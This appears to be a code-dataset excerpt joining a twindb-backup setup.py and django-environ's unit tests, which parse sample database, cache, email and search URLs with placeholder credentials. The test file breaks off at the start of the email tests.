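# equal-length numpy arrays, since simple_accuracy relies on elementwise
# comparison and .mean(), e.g.
#   glue_compute_metrics("mrpc", preds, labels)
#   -> {"acc": ..., "f1": ..., "acc_and_f1": ...}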
| 35.844444
| 91
| 0.626162
|
804fd0aea8c6d20186d32c73162f2e762b1045ef
| 1,398
|
py
|
Python
|
setup.py
|
RyanCPeters/backup
|
4dc19602989fe7dc49ca409d786fc833d1fcabf9
|
[
"Apache-2.0"
] | 69
|
2016-06-29T16:13:55.000Z
|
2022-03-21T06:38:37.000Z
|
setup.py
|
RyanCPeters/backup
|
4dc19602989fe7dc49ca409d786fc833d1fcabf9
|
[
"Apache-2.0"
] | 237
|
2016-09-28T02:12:34.000Z
|
2022-03-25T13:32:23.000Z
|
setup.py
|
RyanCPeters/backup
|
4dc19602989fe7dc49ca409d786fc833d1fcabf9
|
[
"Apache-2.0"
] | 45
|
2017-01-04T21:20:27.000Z
|
2021-12-29T10:42:22.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from setuptools import setup, find_packages
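# Deleting os.link below makes setuptools copy files instead of creating hard
# links, a common workaround for filesystems that do not support hard links
# (e.g. shared folders under Vagrant/VirtualBox).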
del os.link
with open("README.rst") as readme_file:
readme = readme_file.read()
with open("HISTORY.rst") as history_file:
history = history_file.read()
with open("requirements.txt") as f:
requirements = f.read().strip().split("\n")
with open("requirements_dev.txt") as f:
test_requirements = f.read().strip().split("\n")
setup(
name="twindb-backup",
version="2.20.2",
description="TwinDB Backup tool for files, MySQL et al.",
long_description=readme + "\n\n" + history,
author="TwinDB Development Team",
author_email="dev@twindb.com",
url="https://github.com/twindb/twindb_backup",
packages=find_packages(exclude=("tests*",)),
package_dir={"twindb_backup": "twindb_backup"},
entry_points={"console_scripts": ["twindb-backup=twindb_backup.cli:main"]},
include_package_data=True,
install_requires=requirements,
license="Apache Software License 2.0",
zip_safe=False,
keywords="twindb_backup",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Natural Language :: English",
"Programming Language :: Python :: 3",
],
test_suite="tests",
tests_require=test_requirements,
)
| 30.391304
| 79
| 0.670243
|
c0f40a57317e3250eccda478b01aab549f3a23c1
| 33,332
|
py
|
Python
|
environ/test.py
|
kaiman1234/django-environ
|
e01b362be2a0de0685458c19a5b62491c8a35cb9
|
[
"MIT"
] | 1
|
2021-12-30T16:24:34.000Z
|
2021-12-30T16:24:34.000Z
|
environ/test.py
|
kaiman1234/django-environ
|
e01b362be2a0de0685458c19a5b62491c8a35cb9
|
[
"MIT"
] | null | null | null |
environ/test.py
|
kaiman1234/django-environ
|
e01b362be2a0de0685458c19a5b62491c8a35cb9
|
[
"MIT"
] | null | null | null |
import os
import sys
import unittest
import warnings
from urllib.parse import quote
from .compat import json, DJANGO_POSTGRES, ImproperlyConfigured, REDIS_DRIVER
from environ import Env, Path
class BaseTests(unittest.TestCase):
URL = 'http://www.google.com/'
POSTGRES = 'postgres://uf07k1:wegauwhg@ec2-107-21-253-135.compute-1.amazonaws.com:5431/d8r82722'
MYSQL = 'mysql://bea6eb0:69772142@us-cdbr-east.cleardb.com/heroku_97681?reconnect=true'
MYSQLGIS = 'mysqlgis://user:password@127.0.0.1/some_database'
SQLITE = 'sqlite:////full/path/to/your/database/file.sqlite'
ORACLE_TNS = 'oracle://user:password@sid/'
ORACLE = 'oracle://user:password@host:1521/sid'
CUSTOM_BACKEND = 'custom.backend://user:password@example.com:5430/database'
REDSHIFT = 'redshift://user:password@examplecluster.abc123xyz789.us-west-2.redshift.amazonaws.com:5439/dev'
MEMCACHE = 'memcache://127.0.0.1:11211'
REDIS = 'rediscache://127.0.0.1:6379/1?client_class=django_redis.client.DefaultClient&password=secret'
EMAIL = 'smtps://user@domain.com:password@smtp.example.com:587'
JSON = dict(one='bar', two=2, three=33.44)
DICT = dict(foo='bar', test='on')
PATH = '/home/dev'
EXPORTED = 'exported var'
@classmethod
def generateData(cls):
return dict(STR_VAR='bar',
MULTILINE_STR_VAR='foo\\nbar',
INT_VAR='42',
FLOAT_VAR='33.3',
FLOAT_COMMA_VAR='33,3',
FLOAT_STRANGE_VAR1='123,420,333.3',
FLOAT_STRANGE_VAR2='123.420.333,3',
BOOL_TRUE_VAR='1',
BOOL_TRUE_VAR2='True',
BOOL_FALSE_VAR='0',
BOOL_FALSE_VAR2='False',
PROXIED_VAR='$STR_VAR',
INT_LIST='42,33',
INT_TUPLE='(42,33)',
STR_LIST_WITH_SPACES=' foo, bar',
EMPTY_LIST='',
DICT_VAR='foo=bar,test=on',
DATABASE_URL=cls.POSTGRES,
DATABASE_MYSQL_URL=cls.MYSQL,
DATABASE_MYSQL_GIS_URL=cls.MYSQLGIS,
DATABASE_SQLITE_URL=cls.SQLITE,
DATABASE_ORACLE_URL=cls.ORACLE,
DATABASE_ORACLE_TNS_URL=cls.ORACLE_TNS,
DATABASE_REDSHIFT_URL=cls.REDSHIFT,
DATABASE_CUSTOM_BACKEND_URL=cls.CUSTOM_BACKEND,
CACHE_URL=cls.MEMCACHE,
CACHE_REDIS=cls.REDIS,
EMAIL_URL=cls.EMAIL,
URL_VAR=cls.URL,
JSON_VAR=json.dumps(cls.JSON),
PATH_VAR=cls.PATH,
EXPORTED_VAR=cls.EXPORTED)
def setUp(self):
self._old_environ = os.environ
os.environ = Env.ENVIRON = self.generateData()
self.env = Env()
def tearDown(self):
os.environ = self._old_environ
def assertTypeAndValue(self, type_, expected, actual):
self.assertEqual(type_, type(actual))
self.assertEqual(expected, actual)
class EnvTests(BaseTests):
def test_not_present_with_default(self):
self.assertEqual(3, self.env('not_present', default=3))
def test_not_present_without_default(self):
self.assertRaises(ImproperlyConfigured, self.env, 'not_present')
def test_contains(self):
self.assertTrue('STR_VAR' in self.env)
self.assertTrue('EMPTY_LIST' in self.env)
self.assertFalse('I_AM_NOT_A_VAR' in self.env)
def test_str(self):
self.assertTypeAndValue(str, 'bar', self.env('STR_VAR'))
self.assertTypeAndValue(str, 'bar', self.env.str('STR_VAR'))
self.assertTypeAndValue(str, 'foo\\nbar', self.env.str('MULTILINE_STR_VAR'))
self.assertTypeAndValue(str, 'foo\nbar', self.env.str('MULTILINE_STR_VAR', multiline=True))
def test_bytes(self):
self.assertTypeAndValue(bytes, b'bar', self.env.bytes('STR_VAR'))
def test_int(self):
self.assertTypeAndValue(int, 42, self.env('INT_VAR', cast=int))
self.assertTypeAndValue(int, 42, self.env.int('INT_VAR'))
def test_int_with_none_default(self):
self.assertTrue(self.env('NOT_PRESENT_VAR', cast=int, default=None) is None)
def test_float(self):
self.assertTypeAndValue(float, 33.3, self.env('FLOAT_VAR', cast=float))
self.assertTypeAndValue(float, 33.3, self.env.float('FLOAT_VAR'))
self.assertTypeAndValue(float, 33.3, self.env('FLOAT_COMMA_VAR', cast=float))
self.assertTypeAndValue(float, 123420333.3, self.env('FLOAT_STRANGE_VAR1', cast=float))
self.assertTypeAndValue(float, 123420333.3, self.env('FLOAT_STRANGE_VAR2', cast=float))
def test_bool_true(self):
self.assertTypeAndValue(bool, True, self.env('BOOL_TRUE_VAR', cast=bool))
self.assertTypeAndValue(bool, True, self.env('BOOL_TRUE_VAR2', cast=bool))
self.assertTypeAndValue(bool, True, self.env.bool('BOOL_TRUE_VAR'))
def test_bool_false(self):
self.assertTypeAndValue(bool, False, self.env('BOOL_FALSE_VAR', cast=bool))
self.assertTypeAndValue(bool, False, self.env('BOOL_FALSE_VAR2', cast=bool))
self.assertTypeAndValue(bool, False, self.env.bool('BOOL_FALSE_VAR'))
def test_proxied_value(self):
self.assertEqual('bar', self.env('PROXIED_VAR'))
def test_int_list(self):
self.assertTypeAndValue(list, [42, 33], self.env('INT_LIST', cast=[int]))
self.assertTypeAndValue(list, [42, 33], self.env.list('INT_LIST', int))
def test_int_tuple(self):
self.assertTypeAndValue(tuple, (42, 33), self.env('INT_LIST', cast=(int,)))
self.assertTypeAndValue(tuple, (42, 33), self.env.tuple('INT_LIST', int))
self.assertTypeAndValue(tuple, ('42', '33'), self.env.tuple('INT_LIST'))
def test_str_list_with_spaces(self):
self.assertTypeAndValue(list, [' foo', ' bar'],
self.env('STR_LIST_WITH_SPACES', cast=[str]))
self.assertTypeAndValue(list, [' foo', ' bar'],
self.env.list('STR_LIST_WITH_SPACES'))
def test_empty_list(self):
self.assertTypeAndValue(list, [], self.env('EMPTY_LIST', cast=[int]))
def test_dict_value(self):
self.assertTypeAndValue(dict, self.DICT, self.env.dict('DICT_VAR'))
def test_dict_parsing(self):
self.assertEqual({'a': '1'}, self.env.parse_value('a=1', dict))
self.assertEqual({'a': 1}, self.env.parse_value('a=1', dict(value=int)))
self.assertEqual({'a': ['1', '2', '3']}, self.env.parse_value('a=1,2,3', dict(value=[str])))
self.assertEqual({'a': [1, 2, 3]}, self.env.parse_value('a=1,2,3', dict(value=[int])))
self.assertEqual({'a': 1, 'b': [1.1, 2.2], 'c': 3},
self.env.parse_value('a=1;b=1.1,2.2;c=3', dict(value=int, cast=dict(b=[float]))))
self.assertEqual({'a': "uname", 'c': "http://www.google.com", 'b': True},
self.env.parse_value('a=uname;c=http://www.google.com;b=True', dict(value=str, cast=dict(b=bool))))
def test_url_value(self):
url = self.env.url('URL_VAR')
self.assertEqual(url.__class__, self.env.URL_CLASS)
self.assertEqual(url.geturl(), self.URL)
self.assertEqual(None, self.env.url('OTHER_URL', default=None))
def test_url_encoded_parts(self):
password_with_unquoted_characters = "#password"
encoded_url = "mysql://user:%s@127.0.0.1:3306/dbname" % quote(password_with_unquoted_characters)
parsed_url = self.env.db_url_config(encoded_url)
self.assertEqual(parsed_url['PASSWORD'], password_with_unquoted_characters)
def test_db_url_value(self):
pg_config = self.env.db()
self.assertEqual(pg_config['ENGINE'], DJANGO_POSTGRES)
self.assertEqual(pg_config['NAME'], 'd8r82722')
self.assertEqual(pg_config['HOST'], 'ec2-107-21-253-135.compute-1.amazonaws.com')
self.assertEqual(pg_config['USER'], 'uf07k1')
self.assertEqual(pg_config['PASSWORD'], 'wegauwhg')
self.assertEqual(pg_config['PORT'], 5431)
mysql_config = self.env.db('DATABASE_MYSQL_URL')
self.assertEqual(mysql_config['ENGINE'], 'django.db.backends.mysql')
self.assertEqual(mysql_config['NAME'], 'heroku_97681')
self.assertEqual(mysql_config['HOST'], 'us-cdbr-east.cleardb.com')
self.assertEqual(mysql_config['USER'], 'bea6eb0')
self.assertEqual(mysql_config['PASSWORD'], '69772142')
self.assertEqual(mysql_config['PORT'], '')
mysql_gis_config = self.env.db('DATABASE_MYSQL_GIS_URL')
self.assertEqual(mysql_gis_config['ENGINE'], 'django.contrib.gis.db.backends.mysql')
self.assertEqual(mysql_gis_config['NAME'], 'some_database')
self.assertEqual(mysql_gis_config['HOST'], '127.0.0.1')
self.assertEqual(mysql_gis_config['USER'], 'user')
self.assertEqual(mysql_gis_config['PASSWORD'], 'password')
self.assertEqual(mysql_gis_config['PORT'], '')
oracle_config = self.env.db('DATABASE_ORACLE_TNS_URL')
self.assertEqual(oracle_config['ENGINE'], 'django.db.backends.oracle')
self.assertEqual(oracle_config['NAME'], 'sid')
self.assertEqual(oracle_config['HOST'], '')
self.assertEqual(oracle_config['USER'], 'user')
self.assertEqual(oracle_config['PASSWORD'], 'password')
self.assertFalse('PORT' in oracle_config)
oracle_config = self.env.db('DATABASE_ORACLE_URL')
self.assertEqual(oracle_config['ENGINE'], 'django.db.backends.oracle')
self.assertEqual(oracle_config['NAME'], 'sid')
self.assertEqual(oracle_config['HOST'], 'host')
self.assertEqual(oracle_config['USER'], 'user')
self.assertEqual(oracle_config['PASSWORD'], 'password')
self.assertEqual(oracle_config['PORT'], '1521')
redshift_config = self.env.db('DATABASE_REDSHIFT_URL')
self.assertEqual(redshift_config['ENGINE'], 'django_redshift_backend')
self.assertEqual(redshift_config['NAME'], 'dev')
self.assertEqual(redshift_config['HOST'], 'examplecluster.abc123xyz789.us-west-2.redshift.amazonaws.com')
self.assertEqual(redshift_config['USER'], 'user')
self.assertEqual(redshift_config['PASSWORD'], 'password')
self.assertEqual(redshift_config['PORT'], 5439)
sqlite_config = self.env.db('DATABASE_SQLITE_URL')
self.assertEqual(sqlite_config['ENGINE'], 'django.db.backends.sqlite3')
self.assertEqual(sqlite_config['NAME'], '/full/path/to/your/database/file.sqlite')
custom_backend_config = self.env.db('DATABASE_CUSTOM_BACKEND_URL')
self.assertEqual(custom_backend_config['ENGINE'], 'custom.backend')
self.assertEqual(custom_backend_config['NAME'], 'database')
self.assertEqual(custom_backend_config['HOST'], 'example.com')
self.assertEqual(custom_backend_config['USER'], 'user')
self.assertEqual(custom_backend_config['PASSWORD'], 'password')
self.assertEqual(custom_backend_config['PORT'], 5430)
def test_cache_url_value(self):
cache_config = self.env.cache_url()
self.assertEqual(cache_config['BACKEND'], 'django.core.cache.backends.memcached.MemcachedCache')
self.assertEqual(cache_config['LOCATION'], '127.0.0.1:11211')
redis_config = self.env.cache_url('CACHE_REDIS')
self.assertEqual(redis_config['BACKEND'], 'django_redis.cache.RedisCache')
self.assertEqual(redis_config['LOCATION'], 'redis://127.0.0.1:6379/1')
self.assertEqual(redis_config['OPTIONS'], {
'CLIENT_CLASS': 'django_redis.client.DefaultClient',
'PASSWORD': 'secret',
})
def test_email_url_value(self):
email_config = self.env.email_url()
self.assertEqual(email_config['EMAIL_BACKEND'], 'django.core.mail.backends.smtp.EmailBackend')
self.assertEqual(email_config['EMAIL_HOST'], 'smtp.example.com')
self.assertEqual(email_config['EMAIL_HOST_PASSWORD'], 'password')
self.assertEqual(email_config['EMAIL_HOST_USER'], 'user@domain.com')
self.assertEqual(email_config['EMAIL_PORT'], 587)
self.assertEqual(email_config['EMAIL_USE_TLS'], True)
def test_json_value(self):
self.assertEqual(self.JSON, self.env.json('JSON_VAR'))
def test_path(self):
root = self.env.path('PATH_VAR')
self.assertTypeAndValue(Path, Path(self.PATH), root)
def test_smart_cast(self):
self.assertEqual(self.env.get_value('STR_VAR', default='string'), 'bar')
self.assertEqual(self.env.get_value('BOOL_TRUE_VAR', default=True), True)
self.assertEqual(self.env.get_value('BOOL_FALSE_VAR', default=True), False)
self.assertEqual(self.env.get_value('INT_VAR', default=1), 42)
self.assertEqual(self.env.get_value('FLOAT_VAR', default=1.2), 33.3)
def test_exported(self):
self.assertEqual(self.EXPORTED, self.env('EXPORTED_VAR'))
class FileEnvTests(EnvTests):
def setUp(self):
super().setUp()
Env.ENVIRON = {}
self.env = Env()
file_path = Path(__file__, is_file=True)('test_env.txt')
self.env.read_env(file_path, PATH_VAR=Path(__file__, is_file=True).__root__)
class SubClassTests(EnvTests):
def setUp(self):
super().setUp()
self.CONFIG = self.generateData()
class MyEnv(Env):
ENVIRON = self.CONFIG
self.env = MyEnv()
def test_singleton_environ(self):
self.assertTrue(self.CONFIG is self.env.ENVIRON)
class SchemaEnvTests(BaseTests):
def test_schema(self):
env = Env(INT_VAR=int, NOT_PRESENT_VAR=(float, 33.3), STR_VAR=str,
INT_LIST=[int], DEFAULT_LIST=([int], [2]))
self.assertTypeAndValue(int, 42, env('INT_VAR'))
self.assertTypeAndValue(float, 33.3, env('NOT_PRESENT_VAR'))
self.assertEqual('bar', env('STR_VAR'))
self.assertEqual('foo', env('NOT_PRESENT2', default='foo'))
self.assertTypeAndValue(list, [42, 33], env('INT_LIST'))
self.assertTypeAndValue(list, [2], env('DEFAULT_LIST'))
# Override schema in this one case
self.assertTypeAndValue(str, '42', env('INT_VAR', cast=str))
class DatabaseTestSuite(unittest.TestCase):
def test_postgres_parsing(self):
url = 'postgres://uf07k1i6d8ia0v:wegauwhgeuioweg@ec2-107-21-253-135.compute-1.amazonaws.com:5431/d8r82722r2kuvn'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], DJANGO_POSTGRES)
self.assertEqual(url['NAME'], 'd8r82722r2kuvn')
self.assertEqual(url['HOST'], 'ec2-107-21-253-135.compute-1.amazonaws.com')
self.assertEqual(url['USER'], 'uf07k1i6d8ia0v')
self.assertEqual(url['PASSWORD'], 'wegauwhgeuioweg')
self.assertEqual(url['PORT'], 5431)
def test_postgres_parsing_unix_domain_socket(self):
url = 'postgres:////var/run/postgresql/db'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], DJANGO_POSTGRES)
self.assertEqual(url['NAME'], 'db')
self.assertEqual(url['HOST'], '/var/run/postgresql')
def test_postgis_parsing(self):
url = 'postgis://uf07k1i6d8ia0v:wegauwhgeuioweg@ec2-107-21-253-135.compute-1.amazonaws.com:5431/d8r82722r2kuvn'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.contrib.gis.db.backends.postgis')
self.assertEqual(url['NAME'], 'd8r82722r2kuvn')
self.assertEqual(url['HOST'], 'ec2-107-21-253-135.compute-1.amazonaws.com')
self.assertEqual(url['USER'], 'uf07k1i6d8ia0v')
self.assertEqual(url['PASSWORD'], 'wegauwhgeuioweg')
self.assertEqual(url['PORT'], 5431)
def test_mysql_gis_parsing(self):
url = 'mysqlgis://uf07k1i6d8ia0v:wegauwhgeuioweg@ec2-107-21-253-135.compute-1.amazonaws.com:5431/d8r82722r2kuvn'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.contrib.gis.db.backends.mysql')
self.assertEqual(url['NAME'], 'd8r82722r2kuvn')
self.assertEqual(url['HOST'], 'ec2-107-21-253-135.compute-1.amazonaws.com')
self.assertEqual(url['USER'], 'uf07k1i6d8ia0v')
self.assertEqual(url['PASSWORD'], 'wegauwhgeuioweg')
self.assertEqual(url['PORT'], 5431)
def test_cleardb_parsing(self):
url = 'mysql://bea6eb025ca0d8:69772142@us-cdbr-east.cleardb.com/heroku_97681db3eff7580?reconnect=true'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.db.backends.mysql')
self.assertEqual(url['NAME'], 'heroku_97681db3eff7580')
self.assertEqual(url['HOST'], 'us-cdbr-east.cleardb.com')
self.assertEqual(url['USER'], 'bea6eb025ca0d8')
self.assertEqual(url['PASSWORD'], '69772142')
self.assertEqual(url['PORT'], '')
def test_mysql_no_password(self):
url = 'mysql://travis@localhost/test_db'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.db.backends.mysql')
self.assertEqual(url['NAME'], 'test_db')
self.assertEqual(url['HOST'], 'localhost')
self.assertEqual(url['USER'], 'travis')
self.assertEqual(url['PASSWORD'], '')
self.assertEqual(url['PORT'], '')
def test_empty_sqlite_url(self):
url = 'sqlite://'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.db.backends.sqlite3')
self.assertEqual(url['NAME'], ':memory:')
def test_memory_sqlite_url(self):
url = 'sqlite://:memory:'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.db.backends.sqlite3')
self.assertEqual(url['NAME'], ':memory:')
def test_memory_sqlite_url_warns_about_netloc(self):
url = 'sqlite://missing-slash-path'
with warnings.catch_warnings(record=True) as w:
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'django.db.backends.sqlite3')
self.assertEqual(url['NAME'], ':memory:')
self.assertEqual(len(w), 1)
self.assertTrue(issubclass(w[0].category, UserWarning))
def test_database_options_parsing(self):
url = 'postgres://user:pass@host:1234/dbname?conn_max_age=600'
url = Env.db_url_config(url)
self.assertEqual(url['CONN_MAX_AGE'], 600)
url = 'postgres://user:pass@host:1234/dbname?conn_max_age=None&autocommit=True&atomic_requests=False'
url = Env.db_url_config(url)
self.assertEqual(url['CONN_MAX_AGE'], None)
self.assertEqual(url['AUTOCOMMIT'], True)
self.assertEqual(url['ATOMIC_REQUESTS'], False)
url = 'mysql://user:pass@host:1234/dbname?init_command=SET storage_engine=INNODB'
url = Env.db_url_config(url)
self.assertEqual(url['OPTIONS'], {
'init_command': 'SET storage_engine=INNODB',
})
def test_database_ldap_url(self):
url = 'ldap://cn=admin,dc=nodomain,dc=org:some_secret_password@ldap.nodomain.org/'
url = Env.db_url_config(url)
self.assertEqual(url['ENGINE'], 'ldapdb.backends.ldap')
self.assertEqual(url['HOST'], 'ldap.nodomain.org')
self.assertEqual(url['PORT'], '')
self.assertEqual(url['NAME'], 'ldap://ldap.nodomain.org')
self.assertEqual(url['USER'], 'cn=admin,dc=nodomain,dc=org')
self.assertEqual(url['PASSWORD'], 'some_secret_password')
class CacheTestSuite(unittest.TestCase):
def test_base_options_parsing(self):
url = 'memcache://127.0.0.1:11211/?timeout=0&key_prefix=cache_&key_function=foo.get_key&version=1'
url = Env.cache_url_config(url)
self.assertEqual(url['KEY_PREFIX'], 'cache_')
self.assertEqual(url['KEY_FUNCTION'], 'foo.get_key')
self.assertEqual(url['TIMEOUT'], 0)
self.assertEqual(url['VERSION'], 1)
url = 'redis://127.0.0.1:6379/?timeout=None'
url = Env.cache_url_config(url)
self.assertEqual(url['TIMEOUT'], None)
def test_memcache_parsing(self):
url = 'memcache://127.0.0.1:11211'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.memcached.MemcachedCache')
self.assertEqual(url['LOCATION'], '127.0.0.1:11211')
def test_memcache_pylib_parsing(self):
url = 'pymemcache://127.0.0.1:11211'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.memcached.PyLibMCCache')
self.assertEqual(url['LOCATION'], '127.0.0.1:11211')
def test_memcache_multiple_parsing(self):
url = 'memcache://172.19.26.240:11211,172.19.26.242:11212'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.memcached.MemcachedCache')
self.assertEqual(url['LOCATION'], ['172.19.26.240:11211', '172.19.26.242:11212'])
def test_memcache_socket_parsing(self):
url = 'memcache:///tmp/memcached.sock'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.memcached.MemcachedCache')
self.assertEqual(url['LOCATION'], 'unix:/tmp/memcached.sock')
def test_dbcache_parsing(self):
url = 'dbcache://my_cache_table'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.db.DatabaseCache')
self.assertEqual(url['LOCATION'], 'my_cache_table')
def test_filecache_parsing(self):
url = 'filecache:///var/tmp/django_cache'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.filebased.FileBasedCache')
self.assertEqual(url['LOCATION'], '/var/tmp/django_cache')
def test_filecache_windows_parsing(self):
url = 'filecache://C:/foo/bar'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.filebased.FileBasedCache')
self.assertEqual(url['LOCATION'], 'C:/foo/bar')
def test_locmem_parsing(self):
url = 'locmemcache://'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.locmem.LocMemCache')
self.assertEqual(url['LOCATION'], '')
def test_locmem_named_parsing(self):
url = 'locmemcache://unique-snowflake'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.locmem.LocMemCache')
self.assertEqual(url['LOCATION'], 'unique-snowflake')
def test_dummycache_parsing(self):
url = 'dummycache://'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.dummy.DummyCache')
self.assertEqual(url['LOCATION'], '')
def test_redis_parsing(self):
url = 'rediscache://127.0.0.1:6379/1?client_class=django_redis.client.DefaultClient&password=secret'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], REDIS_DRIVER)
self.assertEqual(url['LOCATION'], 'redis://127.0.0.1:6379/1')
self.assertEqual(url['OPTIONS'], {
'CLIENT_CLASS': 'django_redis.client.DefaultClient',
'PASSWORD': 'secret',
})
def test_redis_socket_parsing(self):
url = 'rediscache:///path/to/socket:1'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django_redis.cache.RedisCache')
self.assertEqual(url['LOCATION'], 'unix:///path/to/socket:1')
def test_redis_with_password_parsing(self):
url = 'rediscache://:redispass@127.0.0.1:6379/0'
url = Env.cache_url_config(url)
self.assertEqual(REDIS_DRIVER, url['BACKEND'])
self.assertEqual(url['LOCATION'], 'redis://:redispass@127.0.0.1:6379/0')
def test_redis_multi_location_parsing(self):
url = 'rediscache://host1:6379,host2:6379,host3:9999/1'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], REDIS_DRIVER)
self.assertEqual(url['LOCATION'], [
'redis://host1:6379/1',
'redis://host2:6379/1',
'redis://host3:9999/1',
])
def test_redis_socket_url(self):
url = 'redis://:redispass@/path/to/socket.sock?db=0'
url = Env.cache_url_config(url)
self.assertEqual(REDIS_DRIVER, url['BACKEND'])
self.assertEqual(url['LOCATION'], 'unix://:redispass@/path/to/socket.sock')
self.assertEqual(url['OPTIONS'], {
'DB': 0
})
def test_rediss_parsing(self):
url = 'rediss://127.0.0.1:6379/1'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], REDIS_DRIVER)
self.assertEqual(url['LOCATION'], 'rediss://127.0.0.1:6379/1')
def test_options_parsing(self):
url = 'filecache:///var/tmp/django_cache?timeout=60&max_entries=1000&cull_frequency=0'
url = Env.cache_url_config(url)
self.assertEqual(url['BACKEND'], 'django.core.cache.backends.filebased.FileBasedCache')
self.assertEqual(url['LOCATION'], '/var/tmp/django_cache')
self.assertEqual(url['TIMEOUT'], 60)
self.assertEqual(url['OPTIONS'], {
'MAX_ENTRIES': 1000,
'CULL_FREQUENCY': 0,
})
def test_custom_backend(self):
url = 'memcache://127.0.0.1:5400?foo=option&bars=9001'
backend = 'django_redis.cache.RedisCache'
url = Env.cache_url_config(url, backend)
self.assertEqual(url['BACKEND'], backend)
self.assertEqual(url['LOCATION'], '127.0.0.1:5400')
self.assertEqual(url['OPTIONS'], {
'FOO': 'option',
'BARS': 9001,
})
def test_unknown_backend(self):
url = 'unknown-scheme://127.0.0.1:1000'
with self.assertRaises(ImproperlyConfigured) as cm:
Env.cache_url_config(url)
self.assertEqual(str(cm.exception),
'Invalid cache schema unknown-scheme')
def test_empty_url_is_mapped_to_empty_config(self):
self.assertEqual(Env.cache_url_config(''), {})
self.assertEqual(Env.cache_url_config(None), {})
class SearchTestSuite(unittest.TestCase):
solr_url = 'solr://127.0.0.1:8983/solr'
elasticsearch_url = 'elasticsearch://127.0.0.1:9200/index'
whoosh_url = 'whoosh:///home/search/whoosh_index'
xapian_url = 'xapian:///home/search/xapian_index'
simple_url = 'simple:///'
def test_solr_parsing(self):
url = Env.search_url_config(self.solr_url)
self.assertEqual(url['ENGINE'], 'haystack.backends.solr_backend.SolrEngine')
self.assertEqual(url['URL'], 'http://127.0.0.1:8983/solr')
def test_solr_multicore_parsing(self):
timeout = 360
index = 'solr_index'
url = '{}/{}?TIMEOUT={}'.format(self.solr_url, index, timeout)
url = Env.search_url_config(url)
self.assertEqual(url['ENGINE'], 'haystack.backends.solr_backend.SolrEngine')
self.assertEqual(url['URL'], 'http://127.0.0.1:8983/solr/solr_index')
self.assertEqual(url['TIMEOUT'], timeout)
self.assertTrue('INDEX_NAME' not in url)
self.assertTrue('PATH' not in url)
def test_elasticsearch_parsing(self):
timeout = 360
url = '{}?TIMEOUT={}'.format(self.elasticsearch_url, timeout)
url = Env.search_url_config(url)
self.assertEqual(url['ENGINE'], 'haystack.backends.elasticsearch_backend.ElasticsearchSearchEngine')
self.assertTrue('INDEX_NAME' in url.keys())
self.assertEqual(url['INDEX_NAME'], 'index')
self.assertTrue('TIMEOUT' in url.keys())
self.assertEqual(url['TIMEOUT'], timeout)
self.assertTrue('PATH' not in url)
def test_whoosh_parsing(self):
storage = 'file' # or ram
post_limit = 128 * 1024 * 1024
url = '{}?STORAGE={}&POST_LIMIT={}'.format(self.whoosh_url, storage, post_limit)
url = Env.search_url_config(url)
self.assertEqual(url['ENGINE'], 'haystack.backends.whoosh_backend.WhooshEngine')
self.assertTrue('PATH' in url.keys())
self.assertEqual(url['PATH'], '/home/search/whoosh_index')
self.assertTrue('STORAGE' in url.keys())
self.assertEqual(url['STORAGE'], storage)
self.assertTrue('POST_LIMIT' in url.keys())
self.assertEqual(url['POST_LIMIT'], post_limit)
self.assertTrue('INDEX_NAME' not in url)
def test_xapian_parsing(self):
flags = 'myflags'
url = '{}?FLAGS={}'.format(self.xapian_url, flags)
url = Env.search_url_config(url)
self.assertEqual(url['ENGINE'], 'haystack.backends.xapian_backend.XapianEngine')
self.assertTrue('PATH' in url.keys())
self.assertEqual(url['PATH'], '/home/search/xapian_index')
self.assertTrue('FLAGS' in url.keys())
self.assertEqual(url['FLAGS'], flags)
self.assertTrue('INDEX_NAME' not in url)
def test_simple_parsing(self):
url = Env.search_url_config(self.simple_url)
self.assertEqual(url['ENGINE'], 'haystack.backends.simple_backend.SimpleEngine')
self.assertTrue('INDEX_NAME' not in url)
self.assertTrue('PATH' not in url)
def test_common_args_parsing(self):
excluded_indexes = 'myapp.indexes.A,myapp.indexes.B'
include_spelling = 1
batch_size = 100
params = 'EXCLUDED_INDEXES={}&INCLUDE_SPELLING={}&BATCH_SIZE={}'.format(
excluded_indexes,
include_spelling,
batch_size
)
for url in [
self.solr_url,
self.elasticsearch_url,
self.whoosh_url,
self.xapian_url,
self.simple_url,
]:
url = '?'.join([url, params])
url = Env.search_url_config(url)
self.assertTrue('EXCLUDED_INDEXES' in url.keys())
self.assertTrue('myapp.indexes.A' in url['EXCLUDED_INDEXES'])
self.assertTrue('myapp.indexes.B' in url['EXCLUDED_INDEXES'])
            self.assertTrue('INCLUDE_SPELLING' in url.keys())
self.assertTrue(url['INCLUDE_SPELLING'])
self.assertTrue('BATCH_SIZE' in url.keys())
self.assertEqual(url['BATCH_SIZE'], 100)
class EmailTests(unittest.TestCase):
def test_smtp_parsing(self):
